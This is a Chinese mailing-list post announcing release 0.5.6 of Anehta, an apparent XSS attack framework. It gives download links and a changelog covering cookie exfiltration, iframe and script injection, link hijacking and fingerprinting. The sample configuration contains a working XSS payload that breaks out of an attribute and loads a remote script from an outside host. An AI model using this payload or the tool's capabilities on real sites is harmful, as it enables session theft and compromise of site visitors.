测试下可能的话做个GI

On 11月3日, 下午1时31分, 大风 <[EMAIL PROTECTED]> wrote:
> 我很开心的宣布,Anehta 0.5.6 发布了!
>
> 下载地址为:http://anehta.googlecode.com/files/anehta-v0.5.6.zip
>
> http://anehta.googlecode.com/files/anehta-v0.5.6-withoutQQWry.zip
>
> 镜像下载为:http://www.nukeblog.cn/anehta/anehta-v0.5.6-withoutQQWry.rar
>
> (感谢nuke提供镜像)
>
> 这次作出了许多改进,以及修复了许多bug。
>
> 主要changelog如下:
>
> Bug Fix:
> 修正了slave/index.php中设置header的一处bug
> 修正了glype 中自定义cookie时找不到当前路径导致提交失败的bug
> 修复了admin.php和/slave/index.php中时区显示不正确的bug
> 修复了当水印为null时有时候会读取出错的bug
> fix其他一些小bug
>
> 功能调整:
> base.js改名为 anehta.js
> anehta.js 不再依赖于jQuery,可以单独加载
> 扫描签名移到scanner.js中,可选择性加载
> 修改了clx模块中取cookie的方式,改变成每次访问都发送cookie
> 将anehta.logger.logCache()移动到了更重要的clx.js中,保证该函数的运行
> 修改了anehta.inject.injectFlash,加强了兼容性和健壮性
> 修改了 anehta.inject.injectIframe, 增加了注入iframe的id 和 name属性
> 改变了logCache()函数的方法,从GET改成POST,支持提交大数据
> 修改了logCache()函数提交的数据,改变为每次只提交cache中变更的数据
> 后台realtimecmd提交采用base64编码,以绕过magic_quotes对特殊字符的转义。
> 发送邮件后从只删除log.txt变为删除整个目录
> 增加了safe_php库,修补了个别后台的XSS漏洞
> 调整了文件的目录,主要php文件都集中放到了server文件夹中
>
> New Feature:
> 新增以下函数:
> anehta.inject.addIframe();
> anehta.inject.injectCSS();
> anehta.net.cssGet();
> anehta.net.postFormIntoIframe();
> anehta.detect.screenSize();
> anehta.trick.hijackLink();
> anehta.misc.getCurrentPage();
> 新增了检测浏览器类型的方法,增加对浏览器指纹的判断,防止了userAgent伪造
> 统一了anehta.js中函数的命名规则:统一为,第一个单词小写,之后每个单词均大写开
> 头字母:比如getCurrentPage();
> 新增了help 模块,可以直接调用 anehta.help(); 查看API手册
> 新增一个配置脚本: /server/config.php ,可以通过该页面修改配置(admin.php默认
> 集成了此页面)
>
> 关于使用:
> 下载后,只需要解压缩所有文件到某个目录就可以了
>
> 使用前先访问http://xxxxx/anehta
>
> 会自动跳转到http://xxxxx/anehta/server/admin.php
>
> 此次新增了对anehta的配置选项:
>
> 目前暂时不支持对mail.php 的配置,以后会加上,需要配置邮件的朋友,请手动打开
> server/mail.php 进行配置。
>
> 在上面的配置中,修改 anehtaurl 后会自动配置到所有JS文件中,以上三个配置都需
> 要写,不然无法生成正确的JS文件。
>
> 一个典型的配置如下:
> anehtaurl:http://www.a.com/anehta 
>
> boomerangtarget:http://www.alimafia.com/xssDemo.html#'><script
> src=http://www.secwiki.com/anehta/branches/1/feed.js></script><'
>
> boomerangsrc:http://www.a.com/anehta/demo.html
>
> 修改成功后会显示上面三个设置的值,如果没修改成功,请再提交一次表单
>
> 如果要使用demo.html,请记得修改demo.html中的XSS引入feed.js的地址。
>
> [Ph4nt0m] <http://www.ph4nt0m.org/>  
>
> [Ph4nt0m Security Team]
>
>                    <http://blog.ph4nt0m.org/> [EMAIL PROTECTED]
>
>           Email:  [EMAIL PROTECTED]
>
>           PingMe:
> <http://cn.pingme.messenger.yahoo.com/webchat/ajax_webchat.php?yid=han...
> hq&sig=9ae1bbb1ae99009d8859e88e899ab2d1c2a17724>
>
>           === V3ry G00d, V3ry Str0ng ===
>
>           === Ultim4te H4cking ===
>
>           === XPLOITZ ! ===
>
>           === #_# ===
>
> #If you brave,there is nothing you cannot achieve.#
>
>  image001.jpg
> 37K查看下载
>
>  image002.gif
> 5K查看下载
--~--~---------~--~----~------------~-------~--~----~
 要向邮件组发送邮件,请发到 [email protected]
 要退订此邮件,请发邮件至 [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---

回复